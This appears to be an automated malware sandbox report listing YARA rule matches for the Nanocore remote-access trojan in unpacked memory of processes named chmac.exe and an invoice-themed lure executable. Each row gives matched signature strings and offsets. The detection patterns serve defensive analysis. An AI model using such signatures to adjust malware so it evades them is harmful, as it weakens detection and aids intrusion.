14.2.chmac.exe.37b547d.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c60:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d3b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c7a:$s5: IClientLoggingHost
14.2.chmac.exe.37b547d.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.3960e54.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
16.2.chmac.exe.3960e54.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
16.2.chmac.exe.3960e54.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.2.chmac.exe.3733258.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.3733258.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.chmac.exe.3733258.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.3733258.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.2.chmac.exe.400000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.400000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
16.2.chmac.exe.400000.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.400000.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
13.2.chmac.exe.3000000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.chmac.exe.3000000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
13.2.chmac.exe.3000000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.chmac.exe.3000000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
14.2.chmac.exe.50a9b8.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.50a9b8.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.2.chmac.exe.50a9b8.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.50a9b8.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.2.chmac.exe.3960e54.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28289:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x282b6:$x2: IClientNetworkHost
16.2.chmac.exe.3960e54.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28289:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29364:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x282a3:$s5: IClientLoggingHost
16.2.chmac.exe.3960e54.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.2.chmac.exe.2260000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.2260000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.2.chmac.exe.2260000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.2260000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.chmac.exe.2260000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.2260000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.chmac.exe.2260000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.2260000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.0.chmac.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.2.chmac.exe.2500000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.2500000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.2.chmac.exe.2500000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.2500000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.2.chmac.exe.24b0000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.24b0000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.2.chmac.exe.24b0000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.24b0000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.0.chmac.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.0.chmac.exe.415058.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.415058.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.0.chmac.exe.415058.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.415058.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
15.2.chmac.exe.2551458.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
15.2.chmac.exe.2551458.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
15.2.chmac.exe.2551458.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
15.2.chmac.exe.2551458.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.0.chmac.exe.415058.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
